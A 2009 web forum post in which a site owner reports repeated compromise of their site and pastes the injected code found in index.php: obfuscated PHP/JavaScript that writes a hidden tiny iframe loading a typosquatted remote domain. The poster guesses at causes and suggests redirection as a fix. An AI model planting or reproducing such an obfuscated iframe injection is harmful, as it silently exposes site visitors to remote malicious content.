07-06-2009, 11:41 PM
|
#5 (permalink)
|
|
The Contributor
Join Date: May 2009
Location: LA, CA
Posts: 87
Thanks: 0
|
Aristo Ive been attacked myself, I even made a thread about it.
Inserting into the index
This is the latest version of it that I got:
PHP Code:
<?php echo '<script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?><?php echo ''; ?><?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
To date ive seen 4 incarnations of this damn thing already. From what ive read, the problem is with the web hosts hardware configuration, theres usually a security leak there. Another said cause are non-updated bulletin board scripts, which was not the case for me since I have removed that completely already and I still got attacked again.
I have a theory on how to deal with this problem on our side, redirection. It doesnt have to be index.php all the time right?
Last edited by cecilia : 07-07-2009 at 12:32 AM.
|
|
|
|